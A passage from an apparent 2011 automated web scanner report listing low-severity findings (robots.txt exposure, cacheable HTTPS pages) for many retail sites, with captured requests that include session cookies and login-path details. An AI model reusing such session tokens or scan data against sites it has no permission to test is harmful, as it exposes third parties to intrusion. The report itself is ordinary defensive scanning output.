22.110. http://www.res-x.com/ws/r2/Resonance.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.res-x.com

Response

HTTP/1.1 200 OK
Content-Length: 55
Content-Type: text/plain
Last-Modified: Thu, 18 Jan 2007 19:00:12 GMT
Accept-Ranges: bytes
ETag: "08670e1323bc71:bde"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:53:45 GMT
Connection: close

# Disallow all web spiders
User-agent: *
Disallow: /

22.111. http://www.restorationhardware.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restorationhardware.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.restorationhardware.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 03 Dec 2010 00:54:08 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 01:53:13 GMT
Connection: close
Cache-Control: max-age=86400
Expires: Mon, 16 May 2011 20:07:10 GMT

User-agent: *
Disallow: /checkout/
Disallow: /email/
Disallow: /error/
Disallow: /modal/
Disallow: /my-account/
Disallow: /prototypes/
Disallow: /search/
Disallow: /sitewide/
Disallow: /store-portal/

22.112. https://www.restorationhardware.com/my-account/sign-in.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/sign-in.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.restorationhardware.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 03 Dec 2010 00:54:08 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: text/plain; charset=UTF-8
Date: Mon, 16 May 2011 02:09:57 GMT
Connection: close
Cache-Control: max-age=86400
Expires: Tue, 17 May 2011 02:09:57 GMT

User-agent: *
Disallow: /checkout/
Disallow: /email/
Disallow: /error/
Disallow: /modal/
Disallow: /my-account/
Disallow: /prototypes/
Disallow: /search/
Disallow: /sitewide/
Disallow: /store-portal/

22.113. http://www.siteadvisor.com/download/windows.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.siteadvisor.com
Path:	/download/windows.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.siteadvisor.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:41 GMT
Server: Apache
Last-Modified: Wed, 09 Jul 2008 02:03:21 GMT
ETag: "e017b-167-4518db6812c40"
Accept-Ranges: bytes
Content-Length: 359
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow: /cgi-bin/

User-agent: Slurp
Disallow: /cgi-bin/

User-agent: Yahoo-NewsCrawler
Disallow: /cgi-bin/

User-agent: msnbot
Disallow: /cgi-bin/

User-agent: Teoma
Disallow:
...[SNIP]...

22.114. http://www.toshibadirect.com/td/b2c/laptops.to previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toshibadirect.com
Path:	/td/b2c/laptops.to

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:52 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Mon, 19 Jan 2009 18:04:49 GMT
Accept-Ranges: bytes
Content-Length: 296
Connection: close
Content-Type: text/plain

# /robots.txt file for Toshiba

User-agent: *
Sitemap: /sitemap.xml.gz
Disallow: /cgi-bin/tais/pc/
Disallow: /cgi-bin/tais/pr/
Disallow: /cgi-bin/tais/cd/
Disallow: /td/b2c/cart.to
Disallow: /td/b2c/O
...[SNIP]...

22.115. https://www.toshibadirect.com/td/b2c/myaccount.to previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.toshibadirect.com
Path:	/td/b2c/myaccount.to

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Last-Modified: Mon, 19 Jan 2009 18:04:49 GMT
Accept-Ranges: bytes
Content-Length: 296
Connection: close
Content-Type: text/plain

# /robots.txt file for Toshiba

User-agent: *
Sitemap: /sitemap.xml.gz
Disallow: /cgi-bin/tais/pc/
Disallow: /cgi-bin/tais/pr/
Disallow: /cgi-bin/tais/cd/
Disallow: /td/b2c/cart.to
Disallow: /td/b2c/O
...[SNIP]...

22.116. http://www.travelguard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.travelguard.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travelguard.com

Response

HTTP/1.1 200 OK
Content-Length: 2627
Content-Type: text/plain
Content-Location: http://www.travelguard.com/robots.txt
Last-Modified: Wed, 21 Apr 2010 09:06:38 GMT
Accept-Ranges: bytes
ETag: "30eb7f331e1ca1:13c8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 01:59:37 GMT
Connection: close

User-agent: *
Disallow: /911
Disallow: /ads
Disallow: /agentlink
Disallow: /bin
Disallow: /canada
Disallow: /cgi-bin
Disallow: /cgi-bin-
Disallow: /claims
Disallow: /compare
Disallow: /conta
...[SNIP]...

22.117. http://www26.orientaltrading.com/cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www26.orientaltrading.com
Path:	/cm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www26.orientaltrading.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:11 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "17d65d-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=940
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23. Cacheable HTTPS response previous next
There are 26 instances of this issue:

https://ordering.ftd.com/empty/index.epl
https://secure.bluenile.com/accounts/account-sign-in.html
https://secure.orientaltrading.com/ui/userProfile/processRequest.do
https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js
https://subscriptions.marvel.com/checkout/
https://subscriptions.marvel.com/favicon.ico
https://www.acehardware.com/include/emailSignup.html
https://www.armaniexchange.com/pageloading.html
https://www.footlocker.com/account/default.cfm
https://www.footlocker.com/account/default/
https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm
https://www.guitarcenter.com/MyAccount/Login.aspx
https://www.orderhouse.com/default.aspx
https://www.orderhouse.com/dp.aspx
https://www.petsmart.com/helpdesk/password-pop-up.jsp
https://www.redcrossstore.org/dp.aspx
https://www.restorationhardware.com/my-account/forgot-password.jsp
https://www.restorationhardware.com/my-account/register.jsp
https://www.restorationhardware.com/my-account/sign-in.jsp
https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp
https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp
https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp
https://www.restorationhardware.com/sitewide/includes/header/search.jsp
https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc
https://www.toshibadirect.com/td/b2c/headerAjax.jsp
https://www.toshibadirect.com/td/b2c/myaccount.to

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

23.1. https://ordering.ftd.com/empty/index.epl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/empty/index.epl

Request

GET /empty/index.epl HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:10:37 GMT
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
Cache-Control: max-age=86400
Connection: close
Content-Type: text/html
Content-Length: 154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><title>Empty Page</title></head>
<body>


</body>
</html>

23.2. https://secure.bluenile.com/accounts/account-sign-in.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bluenile.com
Path:	/accounts/account-sign-in.html

Request

Response

23.3. https://secure.orientaltrading.com/ui/userProfile/processRequest.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.orientaltrading.com
Path:	/ui/userProfile/processRequest.do

Request

Response

23.4. https://secure.orientaltrading.com/uiframework/skins/default/js/shoppingCart.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.orientaltrading.com
Path:	/uiframework/skins/default/js/shoppingCart.js

Request

GET /uiframework/skins/default/js/shoppingCart.js HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: https://secure.orientaltrading.com/ui/userProfile/processRequest.do?requestURI=displayLogin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; JSESSIONID=sz7tNQ5LLchTqrzz9nrtfknpW1ThvbLMlF1vJ5vfMB2Wpdk8p0s4!-2120161015; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305541001747}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:54 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 10650
Last-Modified: Fri, 06 May 2011 14:08:46 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html

var errorCounter = 0;
var gcErrorMsg = false;
var nextElement;

function getProductDetails(requestURI, productId, sku)
{
document[lookupIdByTagId("frmCategoryLevels")][lookupIdByTagId("reque
...[SNIP]...

23.5. https://subscriptions.marvel.com/checkout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriptions.marvel.com
Path:	/checkout/

Request

Response

23.6. https://subscriptions.marvel.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://subscriptions.marvel.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: subscriptions.marvel.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:33 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 13:58:34 GMT
ETag: "386-73155680"
Accept-Ranges: bytes
Content-Length: 902
X-ServerNickName: Spidey
Keep-Alive: timeout=8, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

............ .p.......(............. .................................................................................................KK..................<<..................................KK......TT
...[SNIP]...

23.7. https://www.acehardware.com/include/emailSignup.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.acehardware.com
Path:	/include/emailSignup.html

Request

GET /include/emailSignup.html HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: https://www.acehardware.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511353374}; fsr.a=1305511371586

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:55 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 03 Jun 2010 08:45:05 GMT
ETag: "4fc44b-118d-4881c39154640"
Accept-Ranges: bytes
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:12:55 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Ace
...[SNIP]...

23.8. https://www.armaniexchange.com/pageloading.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.armaniexchange.com
Path:	/pageloading.html

Request

GET /pageloading.html HTTP/1.1
Host: www.armaniexchange.com
Connection: keep-alive
Referer: https://www.armaniexchange.com/account/login.do?method=view
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; s_cc=true; mbcs=6451B347-829F-5F10-0394-7AA048201BB1; gpv_p4l=Womens; s_sq=mlax5prod%3D%2526pid%253DWomens%2526pidt%253D1%2526oid%253Dhttp%25253A//www.armaniexchange.com/account.do%25253Fmethod%25253Dstart%252526nav%25253D%2525252Fcategory%2525252Fid%2525252F100199%2526ot%253DA; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510204631_768485","to":5,"c":"http://www.armaniexchange.com/category/womens.do","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1305511392054}

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:36 GMT
ETag: "42-a04cb700"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 02:03:35 GMT
Date: Mon, 16 May 2011 02:03:35 GMT
Connection: keep-alive
Content-Length: 66

<html>
<head>
</head>
<body>
Page Loading...
</body>
</html>

23.9. https://www.footlocker.com/account/default.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default.cfm

Request

Response

23.10. https://www.footlocker.com/account/default/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/account/default/

Request

Response

23.11. https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.footlocker.com
Path:	/images/common/coradiant/!crd_prm!.!cm

Request

GET /images/common/coradiant/!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=972739&crd_cnt=0.01&crd_tpb=1305542016332&crd_olt=36042 HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: https://www.footlocker.com/account/default/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Oct 2009 19:18:06 GMT
Accept-Ranges: bytes
Content-Length: 66
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/plain
Date: Mon, 16 May 2011 10:34:14 GMT
Connection: keep-alive

BMB.......>...(...................................................

23.12. https://www.guitarcenter.com/MyAccount/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.guitarcenter.com
Path:	/MyAccount/Login.aspx

Request

Response

23.13. https://www.orderhouse.com/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orderhouse.com
Path:	/default.aspx

Request

Response

23.14. https://www.orderhouse.com/dp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.orderhouse.com
Path:	/dp.aspx

Request

Response

23.15. https://www.petsmart.com/helpdesk/password-pop-up.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/helpdesk/password-pop-up.jsp

Request

GET /helpdesk/password-pop-up.jsp HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: https://www.petsmart.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542896741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:21:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 2874

<HTML><BODY>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>


       Lost password

   </title>

   <link rel="stylesheet" type="text/css" href="/include/s
...[SNIP]...

23.16. https://www.redcrossstore.org/dp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.redcrossstore.org
Path:	/dp.aspx

Request

Response

23.17. https://www.restorationhardware.com/my-account/forgot-password.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/forgot-password.jsp

Request

Response

23.18. https://www.restorationhardware.com/my-account/register.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/register.jsp

Request

Response

23.19. https://www.restorationhardware.com/my-account/sign-in.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/sign-in.jsp

Request

Response

23.20. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/sitewide/data/json/profile-status.jsp

Request

Response

23.21. https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/sitewide/includes/footer/email-sign-up.jsp

Request

GET /sitewide/includes/footer/email-sign-up.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

23.22. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/sitewide/includes/header/expanding-banner-controller.jsp

Request

Response

23.23. https://www.restorationhardware.com/sitewide/includes/header/search.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/sitewide/includes/header/search.jsp

Request

Response

23.24. https://www.toshibadirect.com/js/coremetrics/emptyfunctions.inc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.toshibadirect.com
Path:	/js/coremetrics/emptyfunctions.inc

Request

GET /js/coremetrics/emptyfunctions.inc HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: https://www.toshibadirect.com/td/b2c/myaccount.to
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
